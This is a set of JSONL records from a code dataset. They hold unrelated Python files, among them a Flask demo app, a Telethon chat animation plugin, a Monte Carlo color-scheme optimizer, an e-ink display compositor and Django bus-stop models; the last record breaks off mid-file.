str(n_fft) + '\\n')\n f.write('win_length:' + str(win_length) + '\\n')\n f.write('hop_length:' + str(hop_length) + '\\n')\n f.write('n_mels:' + str(n_mels) + '\\n')\n f.write('trim_db:' + str(trim_db) + '\\n')\n f.write('mono:' + str(mono) + '\\n')\n f.write('decibel:' + str(decibel) + '\\n')\n f.write('normalize:' + str(normalize) + '\\n')","sub_path":"zeroth_korean/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":5082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"640375738","text":"from flask import Flask, render_template\nimport requests\nimport random\n\napp=Flask(__name__)\n\n\n@app.route(\"/\")\ndef chucknorris():\n\tresponse=requests.get('https://api.chucknorris.io/jokes/random')\n\tjson_response=response.json()\n\tjoke=json_response['value']\n\treturn render_template(\"index.html\",joke=joke,name=\"John\",gender=\"Male\")\n\n@app.route(\"/pokemon\")\ndef pokemon():\n\tresponse=requests.get('https://pokeapi.co/api/v2/pokemon-species/')\n\tjson_response=response.json()\n\tpokemon_names=[]\n\tnum=random.randint(0,17)\n\tfor i in range(num):\n\t\tpokemon_names.append((json_response[\"results\"][i][\"name\"],i+1))\n\treturn render_template(\"pokemon.html\",pokemon_names=pokemon_names)\n\t\n\nif __name__=='__main__':\n\tapp.run(debug=True)\n\t\n\t\n\t\n\t\n#Models for all type\n#\n","sub_path":"chucknorrispokemon/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"343829558","text":"\"\"\"COMMAND : .eye\"\"\"\n\nfrom telethon import events\n\nimport asyncio\n\n\n\n\n\n@borg.on(events.NewMessage(pattern=r\"\\.(.*)\", outgoing=True))\n\nasync def _(event):\n\n if event.fwd_from:\n\n return\n\n animation_interval = 3\n\n animation_ttl = range(0, 103)\n\n input_str = event.pattern_match.group(1)\n\n if input_str == \"eye\":\n\n await event.edit(input_str)\n\n animation_chars = [\n\n \"👁👁\\n 👄 =====> Teehee\",\n \"👁👁\\n 👅 =====> TicTac\", \n \"👁👁\\n 💋 =====> Chee\",\n \"👁👁\\n 👄 =====> Umm\",\n \"👁👁\\n 👅 =====> Uhhhh\", \n \"👁👁\\n 💋 =====> Uwuuuuuu\",\n \"👁👁\\n 👄 =====> Yayyyyy\",\n \"👁👁\\n 👅 =====> There you go\", \n \"👁👁\\n 💋 =====> Nyaaa\",\n \"👁👁\\n 👄 =====> Hi All, How Are You Guys...\"\n ]\n\n for i in animation_ttl:\n\n await asyncio.sleep(animation_interval)\n\n await event.edit(animation_chars[i % 103])\n","sub_path":"stdplugins/eye.py","file_name":"eye.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"449397839","text":"import argparse\nimport os.path as osp\nimport pickle\n\nfrom tqdm import *\n\nfrom face_cropper import Cropper\n\nimport torch\n\nfrom pck_dataset import PckDataset\n\ntorch.backends.cudnn.enabled = True\ntorch.backends.cudnn.benchmark = True\n\nparser = argparse.ArgumentParser(description='Retina face cropper')\n\nparser.add_argument('--pck-path', type=str, required=True)\nparser.add_argument('--network', type=str, required=False, default='mobile0.25')\nparser.add_argument('--weights', type=str, required=False, default='weights/mobilenet0.25_Final.pth')\nparser.add_argument('--batchsize', type=int, required=False, default=128)\nparser.add_argument('--num-workers', type=int, required=False, default=8)\nparser.add_argument('--dst-dim', type=int, required=False, default=512)\n\nargs = parser.parse_args()\ncropper = Cropper(network=args.network, weights_path=args.weights,\n im_height=args.dst_dim, im_width=args.dst_dim)\n\ndataset = PckDataset(args.pck_path, dst_dim=args.dst_dim)\ndataloader = torch.utils.data.DataLoader(dataset,\n batch_size=args.batchsize,\n num_workers=args.num_workers,\n shuffle=False)\n\nresult = []\nfor batch in tqdm(dataloader):\n img_tensor, meta = batch\n\n img_tensor = img_tensor.to(0)\n\n det = cropper.find_face_batch(img_tensor=img_tensor, orig_size=meta)\n result.append(det)\n\nwith open('{}.crops.pck'.format(args.pck_path), 'wb') as f:\n pickle.dump(result, f)\n","sub_path":"make_crops.py","file_name":"make_crops.py","file_ext":"py","file_size_in_byte":1520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"354956209","text":"import screen \nfrom survey import AnonymousSurvey\n\nscreen.clear()\n\n# Define a questions, and make a survey.\nquestion = \"What language did you first learn to speack?\"\nmy_survey = AnonymousSurvey(question)\n\n# Show the question, and store responses to the question.\nmy_survey.show_question()\nprint(\"Enter 'q' at any time to quit.\\n\")\nwhile True:\n response = input(\"Language: \")\n if response == 'q':\n break\n my_survey.store_response(response)\n\n# Show the survey results.\nprint(\"\\nThat you to everyone who participated in the survey!\")\nmy_survey.show_results()\n","sub_path":"language_survey.py","file_name":"language_survey.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"347065463","text":"# This source code is part of the Gecos package and is distributed\n# under the 3-Clause BSD License. Please see 'LICENSE.rst' for further\n# information.\n\n__author__ = \"Patrick Kunzmann\"\n__all__ = [\"ColorOptimizer\", \"ScoreFunction\", \"DefaultScoreFunction\"]\n\nfrom collections import namedtuple\nimport abc\nimport copy\nimport numpy as np\nimport numpy.random as random\nimport biotite.sequence as seq\nimport biotite.sequence.align as align\nfrom .colors import lab_to_rgb\n\n\nMIN_L = 0\nMAX_L = 99\nMIN_AB = -128\nMAX_AB = 127\n\n\nclass ColorOptimizer(object):\n \"\"\"\n Create an optimizer that tries to find an optimal color conformation\n within a given color space based on a score function.\n\n The optimizer tries to minimize the return value of the score\n function by adjusting the *Lab* values (coordinates) for each\n symbol in a given alphabet.\n\n Parameters\n ----------\n alphabet : biotite.sequence.Alphabet\n The alphabet to calculate the color conformation for.\n score_function : ScoreFunction or callable\n The score function which should be minimized.\n When calling the object, its only parameter must be an array of\n coordinates with shape *(n, 3)*, where *n* is the length of the\n alphabet.\n Its return value must be a single float - the score.\n space : ColorSpace\n The color space that defines the allowed space for the\n coordinates.\n constraints : ndarray, shape=(n,3), dtype=float, optional\n An array whose non-NaN values are interpreted as constraints.\n Constrained values will be fixed during the optimization.\n \"\"\"\n\n class Result(namedtuple(\"Result\", [\"alphabet\", \"trajectory\", \"scores\"])):\n \"\"\"\n The result of an optimization.\n Contains the final color scheme information as well as the\n course of the coordinates and the score during the optimization.\n\n Parameters\n ----------\n alphabet : biotite.sequence.Alphabet\n The alphabet the optimizer used.\n trajectory : ndarray, shape=(m,n,3), dtype=float\n The course of the coordinates during the simulation.\n scores : ndarray, shape=(m,), dtype=float\n The course of the score during the simulation.\n\n Attributes\n ----------\n alphabet : biotite.sequence.Alphabet\n The alphabet the optimizer used.\n trajectory : ndarray, shape=(m,n,3), dtype=float\n The course of coordinates during the simulation.\n lab_colors : ndarray, shape=(n,3), dtype=float\n The final *Lab* color conformation, i.e. the last element of\n `trajectory`.\n rgb_colors : ndarray, shape=(n,3), dtype=float\n The final color conformation converted into *RGB* colors.\n scores : ndarray, shape=(m,), dtype=float\n The course of the score during the simulation.\n score : float\n The final score, i.e. the last element of `scores`.\n \n \"\"\"\n \n @property\n def score(self):\n return self.scores[-1]\n\n @property\n def lab_colors(self):\n return copy.deepcopy(self.trajectory[-1])\n \n @property\n def rgb_colors(self):\n return lab_to_rgb(self.lab_colors.astype(int))\n \n def __init__(self, alphabet, score_function, space, constraints=None):\n self._alphabet = alphabet\n self._n_symbols = len(alphabet)\n self._score_func = score_function\n self._space = space.space.copy()\n self._coord = None\n self._trajectory = []\n self._scores = []\n\n if constraints is None:\n self._constraints = np.full((self._n_symbols, 3), np.nan)\n else:\n for constraint in constraints:\n if not np.isnan(constraint).any() and \\\n not self._is_allowed(constraint):\n raise ValueError(\n f\"Constraint {constraint} is outside the allowed space\"\n )\n self._constraints = constraints.copy()\n\n ### Set initial conformation ###\n # Every symbol has the 'l', 'a' and 'b' coordinates\n # The coordinates are initially filled with values\n # that are guaranteed to be invalid (l cannot be -1)\n start_coord = np.full((self._n_symbols, 3), -1, dtype=float)\n # Chose start position from allowed positions at random\n for i in range(start_coord.shape[0]):\n while not self._is_allowed(start_coord[i]):\n drawn_coord = random.rand(3)\n drawn_coord[..., 0] *= (MAX_L -MIN_L ) + MIN_L\n drawn_coord[..., 1:] *= (MAX_AB-MIN_AB) + MIN_AB\n start_coord[i] = drawn_coord\n self._apply_constraints(start_coord)\n self._set_coordinates(start_coord)\n\n def set_coordinates(self, coord):\n \"\"\"\n Set the the coordinates of the current color conformation.\n Potential color constraints are applied on these.\n This coordinate changes will be tracked in the trajectory.\n \n Parameters\n ----------\n coord : ndarray, shape=(n,3), dtype=float\n The new coordinates.\n \"\"\"\n if coord.shape != (self._n_symbols, 3):\n raise ValueError(\n f\"Given shape is {coord.shape}, \"\n f\"but expected shape is {(len(self._alphabet), 3)}\"\n )\n for c in coord:\n if not self._is_allowed(c):\n raise ValueError(\n f\"Coordinates {c} are outside the allowed space\"\n )\n coord = coord.copy()\n self._apply_constraints(coord)\n self._set_coordinates(coord)\n \n def _set_coordinates(self, coord, score=None):\n self._coord = coord\n self._trajectory.append(coord)\n if score is None:\n score = self._score_func(coord)\n self._scores.append(score)\n \n def optimize(self, n_steps, temp, step_size):\n \"\"\"\n Perform a Metropolis-Monte-Carlo optimization on the current\n coordinates.\n This tries to minimize the score returned by the score function.\n \n Parameters\n ----------\n n_steps : int\n The number of Monte-Carlo steps.\n temp : float\n The temperature of the optimization.\n At higher temperatures, *score barriers* will be more likely\n overcome, but the optimization will also less likely end in\n a minimum.\n step_size : float\n The radius in which the coordinates is randomly altered in\n each Monte-Carlo step.\n \"\"\"\n for i in range(n_steps):\n score = self._scores[-1]\n new_coord = self._move(self._coord, step_size)\n new_score = self._score_func(new_coord)\n if new_score < score:\n self._set_coordinates(new_coord, new_score)\n else:\n p = np.exp(-(new_score-score) / temp)\n if p > random.rand():\n self._set_coordinates(new_coord, new_score)\n else:\n self._set_coordinates(self._coord, new_score)\n\n def get_result(self):\n \"\"\"\n Get the result of the optimization.\n\n Returns\n -------\n result : ColorOptimizer.Result\n The result.\n \"\"\"\n trajectory = np.array(self._trajectory)\n return ColorOptimizer.Result(\n alphabet = self._alphabet,\n trajectory = trajectory,\n scores = np.array(self._scores)\n )\n \n def _is_allowed(self, coord):\n if coord[0] < MIN_L or coord[0] > MAX_L or \\\n coord[1] < MIN_AB or coord[1] > MAX_AB or \\\n coord[2] < MIN_AB or coord[2] > MAX_AB:\n return False\n # Add sign to ensure the corresponding integer value\n # has an absolute value at least as high as the floating value\n # This ensures that no unallowed values\n # are classified as allowed\n return self._space[\n int(coord[0]) - MIN_L,\n int(coord[1]) - MIN_AB,\n int(coord[2]) - MIN_AB,\n ]\n \n def _move(self, coord, step):\n new_coord = coord + (random.rand(*coord.shape)-0.5) * 2 * step\n self._apply_constraints(new_coord)\n # Resample coordinates for alphabet symbols\n # when outside of the allowed area\n for i in range(new_coord.shape[0]):\n while not self._is_allowed(new_coord[i]):\n new_coord[i] = coord[i] + (random.rand(3)-0.5) * 2 * step\n return new_coord\n \n def _apply_constraints(self, coord):\n mask = ~(np.isnan(self._constraints).any(axis=-1))\n coord[mask] = self._constraints[mask]\n\n\nclass ScoreFunction(metaclass=abc.ABCMeta):\n \"\"\"\n Abstract base class for a score function.\n A score function calculates a score from a color conformation\n (coordinates).\n\n The score is calculated by calling the object with the coordinates\n as single argument.\n Hence, classes inheriting from this base class mut override the\n :func:`__call__()` method.\n\n Parameters\n ----------\n n_symbols : int\n The amount of symbols in the system.\n Equivalent to the length of the alphabet the color scheme is\n generated for.\n This value is used to check the shape of the coordinates when\n calling the score function.\n \"\"\"\n\n def __init__(self, n_symbols):\n self._n_symbols = n_symbols\n\n @abc.abstractmethod\n def __call__(self, coord):\n \"\"\"\n Calculate the score for the given coordinates.\n\n Parameters\n ----------\n coord : ndarray, shape=(n,3), dtype=float\n The coordinates.\n \n Returns\n -------\n score : float\n The score assigned to `coord`.\n \"\"\"\n if len(coord) != self._n_symbols:\n raise ValueError(\n f\"Expected {self._n_symbols} coordinates, but got {len(coord)}\"\n )\n\n\nclass DefaultScoreFunction(ScoreFunction):\n \"\"\"\n Create an instance of the default score function *Gecos* uses.\n\n The score function contains two terms:\n A sum of harmonic potentials between each pair of symbols, based on\n a substitution matrix, and *contrast score* that favors schemes with\n a high contrast.\n\n Parameters\n ----------\n matrix : biotite.sequence.align.SubstitutionMatrix\n A distance matrix is calculated from this score matrix.\n The equilibrium positions scale linearly with the values in the\n distance matrix.\n contrast : int, optional\n A weight for the *contrast score*.\n \"\"\"\n\n def __init__(self, matrix, contrast=500):\n if not matrix.is_symmetric():\n raise ValueError(\"Substitution matrix must be symmetric\")\n super().__init__(len(matrix.get_alphabet1()))\n self._matrix = self._calculate_distance_matrix(matrix)\n self._n = DefaultScoreFunction._n_pairs(len(matrix.score_matrix()))\n self._contrast = contrast\n \n def __call__(self, coord):\n super().__call__(coord)\n dist = np.sqrt(\n np.sum(\n (coord[:, np.newaxis, :] - coord[np.newaxis, :, :])**2, axis=-1\n )\n )\n dist = np.tril(dist)\n dist_sum = np.sum(dist)\n # This factor translates visual distances\n # into substitution matrix distances\n scale_factor = self._n / dist_sum\n # Harmonic potentials between each pair of symbols\n harmonic_score = np.sum((dist*scale_factor - self._matrix)**2)\n # Contrast term: Favours conformations\n # with large absolute color differences\n mean_dist = dist_sum / DefaultScoreFunction._n_pairs(len(dist))\n contrast_score = self._contrast / mean_dist\n return harmonic_score + contrast_score\n \n @staticmethod\n def _calculate_distance_matrix(similarity_matrix):\n scores = similarity_matrix.score_matrix()\n diff_to_max = np.diag(scores) - scores\n distances = np.tril((diff_to_max + diff_to_max.T) / 2)\n # Scale, so that average distance is 1\n n = DefaultScoreFunction._n_pairs(len(scores))\n distances /= (np.sum(distances) / n)\n return distances\n \n @staticmethod\n def _n_pairs(n_symbols):\n \"\"\"\n Calculate the number of values in the lower triangle,\n excluding the main diagonal, of a\n matrix with a shape *(n_symbols, n_symbols)*.\n \"\"\"\n return (n_symbols - 1) / 2 * n_symbols","sub_path":"src/gecos/optimizer.py","file_name":"optimizer.py","file_ext":"py","file_size_in_byte":12635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"243212968","text":"\"\"\"Script for generating heuristics results latex figures.\"\"\"\n\n\n# Imports\nfrom experiments import (\n headers,\n TABLES_DIR,\n RESULTS_DIR,\n GROUND_TRUTH_DATA_FILE\n)\nfrom experiments.datasets import preprocessed\n\nfrom itertools import zip_longest\nimport pathlib\nimport pandas\nimport re\n\nEXACT_RESULTS_DATA_PATH = RESULTS_DIR / 'quantum_exact_results.csv'\n\nIC = 'ic'\nAI = 'vc'\nILP = 'ilp'\nILP1T = 'ilp_1t'\n\n\n# Constants\nSOLVER_ORDERING = [ILP, ILP1T, AI, IC]\nOUTPUT_DIR = TABLES_DIR / 'exact_tables'\nHEADERS = [\n headers.BF_DATASET,\n headers.LT_OPT,\n 'A-I',\n r'$\\text{IC}^+_{2}$',\n 'ILP'\n]\n\n\ndef _rename_dataset(v):\n return re.sub(\n r'([a-zA-Z]+)_?([0-9]+)(?:_([0-9]+))?',\n lambda m: m.group(1) + '-' + m.group(2) + (\n '-' + m.group(3) if m.group(3) else ''\n ),\n v\n ).replace('bqp', 'b')\n\n\ndef _get_metadata(dataset):\n \"\"\"\"Read vertex and edge metadata from an edgelist dataset.\"\"\"\n with open(dataset, 'r') as datafile:\n return datafile.readline().strip().split(' ')\n\n\ndef dataset_sorter(r):\n\n name = r[headers.DATASET]\n\n # Choose how we want to order the datasets\n ORDERING = {\"aa\": 0, \"j\": 1, \"bqp\": 2, \"gka\": 3}\n\n # Head will be letters\n head = name.rstrip(\"0123456789_\")\n\n # Tail could be number or number_number\n tail = name[len(head):].lstrip(\"_\")\n\n # In either case, make tail a tuple of ints\n if \"_\" in tail:\n tail = list(map(int, tail.split(\"_\")))\n else:\n tail = int(tail)\n\n # Return a tuple of ints as our comparison key\n return (ORDERING[head], tail)\n\n\ndef main():\n \"\"\"Load and print results.\"\"\"\n\n # Read exact results\n c = pandas.read_csv(EXACT_RESULTS_DATA_PATH)\n\n # Pivot table\n c = c.drop(columns=[headers.SIZE, headers.CERTIFICATE])\n c = c.set_index([headers.DATASET])\n c = c.pivot(columns=headers.SOLVER)\n c = c.reorder_levels([1, 0], axis=1)\n c.columns = [c[0] for c in c.columns.values]\n c = c[SOLVER_ORDERING]\n c = c.reset_index().fillna('-')\n\n # Read metadata\n gt = pandas.read_csv(str(GROUND_TRUTH_DATA_FILE))\n gt = gt[[headers.DATASET, headers.SIZE]].rename(columns={\n headers.SIZE: headers.OPT\n })\n\n # Merge in metadata\n c = c.merge(gt, on=headers.DATASET)\n\n # Get the individual subsets of records\n first_half = preprocessed[:int(len(preprocessed)/2)]\n second_half = preprocessed[int(len(preprocessed)/2):]\n left_table = c[c[headers.DATASET].isin(first_half)]\n left_records = sorted(left_table.to_dict('records'), key=dataset_sorter)\n right_table = c[c[headers.DATASET].isin(second_half)]\n right_records = sorted(right_table.to_dict('records'), key=dataset_sorter)\n\n # Zip them together so we can iterate\n records = list(zip_longest(left_records, right_records))\n\n def _format_record(r):\n\n # # If no record, just return empty columns\n if not r:\n return ' '.join(['&'] * (len(HEADERS) - 1))\n\n # Otherwise p\n return (\n r'\\texttt{{{dataset}}} & {opt} & {ai} & {ic} & {ilp}'\n .format(\n dataset=_rename_dataset(r.get(headers.DATASET, '')),\n opt=r[headers.OPT],\n ai=r[AI],\n ic=r[IC],\n ilp=r[ILP]\n )\n )\n\n # Start list of lines in the output tex file\n format_str = ''.join(['l'] + ['r'] * (len(HEADERS) - 1))\n header_str = ' & '.join(HEADERS)\n output_lines = [\n r'\\begin{{tabular}}{{{fmt}p{{0.5in}}{fmt}}}'.format(fmt=format_str),\n r'\\toprule',\n r\"\"\" \\multicolumn{2}{c}{\\textbf{Graph}}\n & \\multicolumn{3}{c}{\\textbf{Solver}}\n &\n & \\multicolumn{2}{c}{\\textbf{Graph}}\n & \\multicolumn{3}{c}{\\textbf{Solver}} \\\\\"\"\".replace('\\n', ''),\n r'\\cmidrule(lr){1-2}',\n r'\\cmidrule(lr){3-5}',\n r'\\cmidrule(lr){7-8}',\n r'\\cmidrule(lr){9-11}',\n header_str + ' & & ' + header_str + r' \\\\',\n r'\\midrule',\n *(\n _format_record(t1) + ' & & ' + _format_record(t2) + r' \\\\'\n for t1, t2 in records\n ),\n r'\\bottomrule',\n r'\\end{tabular}'\n ]\n\n # Write output\n pathlib.Path(OUTPUT_DIR).mkdir(parents=True, exist_ok=True)\n output_filename = str(OUTPUT_DIR / 'quantum_exact.tex')\n with open(output_filename, 'w') as output:\n output.writelines(map(lambda l: l + '\\n', output_lines))\n\n\n# Invoke main\nif __name__ == '__main__':\n main()\n print(\"Wrote quantum_exact.tex\")\n","sub_path":"experiments/exact/quantum_plot.py","file_name":"quantum_plot.py","file_ext":"py","file_size_in_byte":4525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"631297550","text":"import uuid\n\nfrom PIL import Image\nfrom PIL import ImageOps\n\nfrom papirus import PapirusTextPos\nfrom papirus.sprite import Sprite\n\n\nWHITE = 1\nBLACK = 0\n\n\nclass RasterSprite(Sprite):\n \"\"\"\n A raster image (e.g. PNG, JPG, BMP) object to be drawn on screen\n \"\"\"\n def __init__(self, file_path, x, y, size):\n super().__init__(x, y, size)\n self.path = file_path\n\n\nclass PapirusComposite(PapirusTextPos):\n def __init__(self, panel, auto_update=True):\n super(PapirusComposite, self).__init__(panel, auto_update)\n self.image_cache = dict()\n self.image = Image.new('1', self.panel.size, WHITE)\n\n def add_raster_sprite(self, file_path, x=0, y=0, size=(10, 10), sprite_id=None):\n # Create a new Id if none is supplied\n if sprite_id is None:\n sprite_id = str(uuid.uuid4())\n\n file_path = Image.open(file_path)\n file_path = ImageOps.grayscale(file_path)\n file_path = file_path.resize(size)\n file_path = file_path.convert(\"1\", dither=Image.FLOYDSTEINBERG)\n\n # If the Id doesn't exist, add it to the dictionary\n if sprite_id not in self.image_cache:\n self.image_cache[sprite_id] = RasterSprite(file_path, x, y, size)\n # add the img to the image\n self.draw_sprite_from_cache(sprite_id)\n # Automatically show?\n if self.auto_update:\n self.write_all()\n\n def update_sprite(self, sprite_id, image):\n # If the ID supplied is in the dictionary, update the img\n # Currently ONLY the img is update\n if sprite_id in self.image_cache:\n image = Image.open(image)\n image = ImageOps.grayscale(image)\n image = image.resize(self.image_cache[sprite_id].size)\n image = image.convert(\"1\", dither=Image.FLOYDSTEINBERG)\n\n self.image_cache[sprite_id].image = image\n\n # Remove from the old img from the image (that doesn't use the actual img)\n self.erase_sprite_from_image(sprite_id)\n # Add the new img to the image\n self.draw_sprite_from_cache(sprite_id)\n # Automatically show?\n if self.auto_update:\n self.write_all()\n\n def remove_sprite(self, sprite_id):\n # If the ID supplied is in the dictionary, remove it.\n if sprite_id in self.image_cache:\n self.erase_sprite_from_image(sprite_id)\n del self.image_cache[sprite_id]\n\n # Automatically show?\n if self.auto_update:\n self.write_all()\n\n def erase_sprite_from_image(self, sprite_id):\n # prepare for drawing\n filler = Image.new('1', self.image_cache[sprite_id].size, WHITE)\n # Draw over the top of the img with a rectangle to cover it\n x = self.image_cache[sprite_id].x\n y = self.image_cache[sprite_id].y\n self.image.paste(filler, (x, y))\n\n def draw_sprite_from_cache(self, sprite_id):\n x = self.image_cache[sprite_id].x\n y = self.image_cache[sprite_id].y\n\n self.image.paste(self.image_cache[sprite_id].image, (x, y))\n","sub_path":"papirus/composite.py","file_name":"composite.py","file_ext":"py","file_size_in_byte":3120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"172511402","text":"\"\"\"\ntemp_mort.py takes the output dictionary from tracking experiments and applies\na mortality to the particles based on a minimum and/or maximum temperature.\n\nThe folder and filename to apply mortality to will be chosen in the run.\n\nOutput: Dictionary with the same shape as input, but with NaNs after \nparticles have stopped.\n\"\"\"\n\nimport pickle\nimport numpy as np\n\nimport os\nimport sys\nalp = os.path.abspath('../alpha')\nif alp not in sys.path:\n sys.path.append(alp)\nimport Lfun\nLdir = Lfun.Lstart()\n\n# temperature minimums and maximums\ntemp_min = 10\ntemp_max = None\n\nindir = Ldir['LOo'] + 'tracks/'\n\n# choose the run directory\nprint('\\n%s\\n' % '** Choose file to apply mortality **')\nd_list_raw = os.listdir(indir)\nd_list = []\nfor d in d_list_raw:\n d_list.append(d)\nNdt = len(d_list)\nfor ndt in range(Ndt):\n print(str(ndt) + ': ' + d_list[ndt])\nmy_ndt = int(input('-- Input number -- '))\ndirname = d_list[my_ndt] + '/'\n\n# create the list of run files\nm_list_raw = os.listdir(indir + dirname)\nm_list = []\nfor m in m_list_raw:\n if m[-2:] == '.p' and 'mort' not in m:\n m_list.append(m)\nNpt = len(m_list)\nfor npt in range(Npt):\n print(str(npt) + ': ' + m_list[npt])\nmy_ndt = int(input('-- Input number (99 for all) -- '))\nif my_ndt == 99:\n pass\nelse:\n m_list = [m_list[my_ndt],]\n\n# loop through each file\nfor m_f in m_list:\n fn = open(indir + dirname + m_f, 'rb')\n \n # load dictionaries from file\n P, G, S, Ldir = pickle.load(fn)\n \n # remove values for mortality\n NP = P['lon'].shape[1]\n # create list of all possible days (assuming less than a year)\n dt0 = P['ot'][0]\n days = dt0 + np.arange(400)*86400\n # go through each timestep\n for ii in range(len(P['ot'])):\n # each day, create a new mask\n if P['ot'][ii] in days:\n # create mask of values below min temp and above max temp\n if temp_min != None & temp_max != None:\n mort_mask = P['temp'][ii,:]>=temp_min & P['temp'][ii,:]<=temp_max\n elif temp_min != None:\n mort_mask = P['temp'][ii,:]>=temp_min \n elif temp_max != None:\n mort_mask = P['temp'][ii,:]<=temp_max\n else:\n raise ValueError('No Minimum or Maximum Temperature Assigned.')\n # set all future values at the mask to nan\n for var in P:\n if var == 'ot':\n pass\n elif var in ['lon', 'lat']:\n P[var][ii:,mort_mask] = P[var][ii, mort_mask]\n else:\n P[var][ii:,mort_mask] = np.nan\n \n # save the results\n \n outname = (m_f[:-2] + '_temperature_max' + str(temp_min) + '_min' + str(temp_max) + '.p')\n \n pickle.dump((P, G, S, Ldir), open(indir + dirname + outname, 'wb'))\n print('Results saved to:\\n' + indir + dirname + outname)\n print(50*'*')","sub_path":"tracker/temp_mort.py","file_name":"temp_mort.py","file_ext":"py","file_size_in_byte":2892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"218281454","text":"import datetime\nfrom django.contrib.gis.db import models\nfrom django.contrib.gis.geos import Point\nfrom django.contrib.postgres.fields import JSONField, DateRangeField\nfrom django.db.models.signals import pre_save\nfrom django.dispatch import receiver\nfrom django.urls import reverse\nfrom django.utils.encoding import python_2_unicode_compatible\nfrom django.utils.text import slugify\n\n\nclass Stop(models.Model):\n atco_code = models.CharField(max_length=12, unique=True, primary_key=True, db_index=True)\n naptan_code = models.CharField(max_length=12)\n # plate_code = models.CharField(max_length=12, null=True, blank=True)\n # cleardown_code = models.CharField(max_length=10, null=True, blank=True)\n common_name = models.CharField(max_length=48)\n # common_name_lang = models.CharField(max_length=2, null=True, blank=True)\n # short_common_name = models.CharField(max_length=48, null=True, blank=True)\n # short_common_name_lang = models.CharField(max_length=2, null=True, blank=True)\n # landmark = models.CharField(max_length=48, null=True, blank=True)\n # landmark_lang = models.CharField(max_length=2, null=True, blank=True)\n # street = models.CharField(max_length=48, null=True, blank=True)\n # street_lang = models.CharField(max_length=2, null=True, blank=True)\n # crossing = models.CharField(max_length=48, null=True, blank=True)\n # crossing_lang = models.CharField(max_length=2, null=True, blank=True)\n indicator = models.CharField(max_length=48, null=True, blank=True)\n # indicator_lang = models.CharField(max_length=2, null=True, blank=True)\n # bearing = models.CharField(max_length=2)\n # nptg_locality_code = models.CharField(max_length=8)\n locality_name = models.CharField(max_length=48)\n # parent_locality_name = models.CharField(max_length=48)\n # grand_parent_locality_name = models.CharField(max_length=48)\n # town = models.CharField(max_length=48, null=True, blank=True)\n # town_lang = models.CharField(max_length=2, null=True, blank=True)\n # suburb = models.CharField(max_length=48, null=True, blank=True)\n # suburb_lang = models.CharField(max_length=2, null=True, blank=True)\n # locality_centre = models.BooleanField()\n # grid_type = models.CharField(max_length=1, null=True, blank=True)\n # easting = models.IntegerField()\n # northing = models.IntegerField()\n longitude = models.FloatField()\n latitude = models.FloatField()\n # stop_type = models.CharField(max_length=3)\n # bus_stop_type = models.CharField(max_length=3, null=True, blank=True)\n # timing_status = models.CharField(max_length=3, null=True, blank=True)\n # default_wait_time = models.IntegerField(null=True, blank=True)\n # notes = models.TextField(null=True, blank=True)\n # notes_lang = models.CharField(max_length=2, null=True, blank=True)\n # administrative_area_code = models.IntegerField()\n # creation_datetime = models.DateTimeField()\n # modification_datetime = models.DateTimeField(null=True, blank=True)\n # revision_number = models.IntegerField(null=True, blank=True)\n # modification = models.CharField(max_length=3, null=True, blank=True)\n # status = models.CharField(max_length=3, null=True, blank=True)\n gis_location = models.PointField(null=True)\n data = JSONField(null=True, blank=True)\n last_modified = models.DateTimeField(auto_now=True)\n\n def get_coordinates(self):\n return [self.latitude, self.longitude]\n\n def get_absolute_url(self):\n return reverse('bus-stop', args=(self.atco_code,))\n\n def get_qualified_name(self):\n return str(self)\n\n @property\n def locality(self):\n return None\n\n @python_2_unicode_compatible\n def __str__(self):\n if self.indicator:\n if self.indicator in ('opp', 'adj', 'at', 'o/s', 'nr', 'before', 'after', 'by', 'on', 'in', 'near'):\n return '%s, %s %s' % (self.locality_name, self.indicator, self.common_name) \\\n if self.locality_name else '%s %s' % (self.indicator, self.common_name)\n else:\n return '%s, %s (%s)' % (self.locality_name, self.common_name, self.indicator) \\\n if self.locality_name else '%s (%s)' % (self.common_name, self.indicator)\n else:\n return '%s, %s' % (self.locality_name, self.common_name) if self.locality_name else '%s' % self.common_name\n\n\n@receiver(pre_save, sender=Stop)\ndef update_gis_fields(sender, instance, **kwargs):\n instance.gis_location = Point(float(instance.longitude), float(instance.latitude))\n\n\nclass Operator(models.Model):\n id = models.CharField(max_length=255, primary_key=True)\n code = models.CharField(max_length=255)\n short_name = models.CharField(max_length=255)\n trading_name = models.CharField(max_length=255)\n last_modified = models.DateTimeField(auto_now=True)\n\n @python_2_unicode_compatible\n def __str__(self):\n return self.trading_name\n\n\nclass Line(models.Model):\n line_id = models.CharField(max_length=255, db_index=True)\n line_name = models.CharField(max_length=255)\n area = models.CharField(max_length=10) # This is the TNDS zone\n filename = models.CharField(max_length=255)\n description = models.CharField(max_length=255)\n operator = models.ForeignKey(Operator, related_name=\"lines\", on_delete=models.CASCADE)\n standard_origin = models.CharField(max_length=255, blank=True, null=True)\n standard_destination = models.CharField(max_length=255, blank=True, null=True)\n regular_days_of_week = models.CharField(max_length=255, null=True)\n bank_holiday_operation = models.CharField(max_length=255, null=True)\n start_date = models.DateField(null=True)\n end_date = models.DateField(null=True)\n stop_list = JSONField(null=True, blank=True)\n timetable = JSONField(null=True, blank=True)\n slug = models.SlugField(max_length=50)\n last_modified = models.DateTimeField(auto_now=True)\n\n def save(self, *args, **kwargs):\n self.slug = slugify('-'.join([self.line_name, self.description]))[:49]\n super(Line, self).save(*args, **kwargs)\n\n def get_stop_list(self):\n stop_list = {}\n for bound in ['inbound', 'outbound']:\n for dayperiod in ['MondayToFriday', 'Saturday', 'Sunday', 'HolidaysOnly']:\n for stop in 